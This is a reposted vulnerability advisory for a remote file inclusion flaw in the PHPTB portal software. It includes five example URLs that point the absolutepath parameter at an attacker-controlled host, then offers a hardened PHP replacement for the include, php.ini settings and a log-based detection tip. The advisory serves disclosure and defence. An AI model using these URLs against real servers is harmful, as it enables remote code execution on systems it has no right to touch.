
[Repost] PHPTB Code Injection Vulnerability


Source: Evil Octal Information Security Team (www.eviloctal.com)

Summary
PHPTB is "an open source portal / topic board system". An input validation flaw in PHPTB code allows malicious attackers to cause the server to execute arbitrary code.

Credit:
The information has been provided by Filip Groszyński.

Details
The vulnerable code exists in the following files: admin_o.php, board_o.php, dev_o.php, file_o.php and tech_o.php:
<?php
include $absolutepath.'classes/smart_o.php';
... EOF

In dev_o.php and tech_o.php:
...
require $GLOBALS['absolutepath'].'userpass.php';
... EOF

Examples:
The following URLs can be used to trigger the vulnerability:
http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/
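The root cause is that $absolutepath is never defined by the scripts themselves, so with register_globals enabled it is populated from the request and include/require then fetches whatever URL the attacker supplies. The following is an added example of a hardened replacement for that include (it is not PHPTB's own code; the helper name phptb_safe_include_path is hypothetical): the path is derived from the script's own location, validated against the installation directory, and the request-supplied variable is discarded. It also assumes the PHP runtime is configured with register_globals=Off and allow_url_include=Off, which closes the same hole for every other include in the code base.

```php
<?php
// Added example, not part of PHPTB. Hardened form of
//   include $absolutepath.'classes/smart_o.php';
// The include target is fixed relative to this file and never taken from
// user input, so ?absolutepath=http://... no longer changes what is loaded.
//
// Recommended php.ini settings assumed alongside this code:
//   register_globals  = Off   ; stop request parameters becoming variables
//   allow_url_include = Off   ; forbid include/require of remote URLs

// Hypothetical helper: resolve a class file that must live inside
// <installation>/classes/ and reject anything else.
function phptb_safe_include_path(string $file): string
{
    // Installation root: one level above classes/, where this script lives.
    $base = realpath(dirname(__DIR__));

    // Accept a bare PHP file name only: no slashes, no "..", no URL scheme.
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $file)) {
        throw new InvalidArgumentException("Refusing to include '$file'");
    }

    $candidate = realpath($base . '/classes/' . $file);

    // realpath() returns false for a missing file; also confirm the resolved
    // path is still under the installation root (defence against symlinks).
    if ($candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("'$file' is outside the installation");
    }
    return $candidate;
}

// Discard any $absolutepath injected via register_globals and include by
// the validated local path instead. Same change applies to the
// require of userpass.php in dev_o.php and tech_o.php.
unset($absolutepath, $GLOBALS['absolutepath']);
include phptb_safe_include_path('smart_o.php');
```

For detection on existing installs, web server logs showing requests to any of the five scripts above with an absolutepath= parameter whose value begins with a URL scheme are a direct indicator of attempted exploitation.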
